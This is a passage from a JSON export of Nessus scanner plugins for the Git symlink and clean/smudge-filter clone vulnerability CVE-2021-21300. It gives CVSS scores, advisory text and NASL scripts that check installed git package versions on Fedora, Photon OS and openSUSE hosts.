"HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-16T00:00:00", "type": "nessus", "title": "Fedora 32 : git (2021-ffd0b2108d)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:git"], "id": "FEDORA_2021-FFD0B2108D.NASL", "href": "https://www.tenable.com/plugins/nessus/147815", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from Fedora Security Advisory FEDORA-2021-ffd0b2108d\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147815);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\"CVE-2021-21300\");\n script_xref(name:\"FEDORA\", value:\"2021-ffd0b2108d\");\n\n script_name(english:\"Fedora 32 : git (2021-ffd0b2108d)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nFEDORA-2021-ffd0b2108d advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters\n have to be configured for that. Git for Windows configures Git LFS by default, and is therefore\n vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a\n workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks\n false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are\n configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning\n repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5,\n 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-ffd0b2108d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:git\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Fedora' >!< release) audit(AUDIT_OS_NOT, 'Fedora');\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 32', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\npkgs = [\n {'reference':'git-2.26.3-2.fc32', 'release':'FC32', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:11", "description": "An update of the git package has been released.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-16T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Git PHSA-2021-1.0-0369", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2021-1_0-0369_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/147825", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-1.0-0369. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147825);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\"CVE-2021-21300\");\n\n script_name(english:\"Photon OS 1.0: Git PHSA-2021-1.0-0369\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the git package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-369.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'git-2.23.3-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'git-lang-2.23.3-2.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:11", "description": "An update of the git package has been released.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-16T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Git PHSA-2021-2.0-0327", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2021-2_0-0327_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/147824", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-2.0-0327. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147824);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\"CVE-2021-21300\");\n\n script_name(english:\"Photon OS 2.0: Git PHSA-2021-2.0-0327\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the git package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-327.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'git-2.23.3-2.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'git-lang-2.23.3-2.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:59", "description": "An update of the git package has been released.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-16T00:00:00", "type": "nessus", "title": "Photon OS 3.0: Git PHSA-2021-3.0-0207", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0207_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/147821", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0207. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147821);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\"CVE-2021-21300\");\n\n script_name(english:\"Photon OS 3.0: Git PHSA-2021-3.0-0207\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the git package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-207.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'git-2.23.3-2.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'git-lang-2.23.3-2.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:17", "description": "This update for git fixes the following issues :\n\n - On case-insensitive filesystems, with support for symbolic links, if Git is configured globally to apply delay-capable clean/smudge filters (such as Git LFS), Git could be fooled into running remote code during a clone. (bsc#1183026, CVE-2021-21300)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-15T00:00:00", "type": "nessus", "title": "openSUSE Security Update : git (openSUSE-2021-405)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-01-26T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:git", "p-cpe:/a:novell:opensuse:git-arch", "p-cpe:/a:novell:opensuse:git-core", "p-cpe:/a:novell:opensuse:git-core-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-libsecret", "p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo", "p-cpe:/a:novell:opensuse:git-cvs", "p-cpe:/a:novell:opensuse:git-daemon", "p-cpe:/a:novell:opensuse:git-daemon-debuginfo", "p-cpe:/a:novell:opensuse:git-debuginfo", "p-cpe:/a:novell:opensuse:git-debugsource", "p-cpe:/a:novell:opensuse:git-email", "p-cpe:/a:novell:opensuse:git-gui", "p-cpe:/a:novell:opensuse:git-p4", "p-cpe:/a:novell:opensuse:git-svn", "p-cpe:/a:novell:opensuse:git-svn-debuginfo", "p-cpe:/a:novell:opensuse:git-web", "p-cpe:/a:novell:opensuse:gitk", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-405.NASL", "href": "https://www.tenable.com/plugins/nessus/147799", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-405.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147799);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\"CVE-2021-21300\");\n\n script_name(english:\"openSUSE Security Update : git (openSUSE-2021-405)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for git fixes the following issues :\n\n - On case-insensitive filesystems, with support for\n symbolic links, if Git is configured globally to apply\n delay-capable clean/smudge filters (such as Git LFS),\n Git could be fooled into running remote code during a\n clone. (bsc#1183026, CVE-2021-21300)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1183026\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 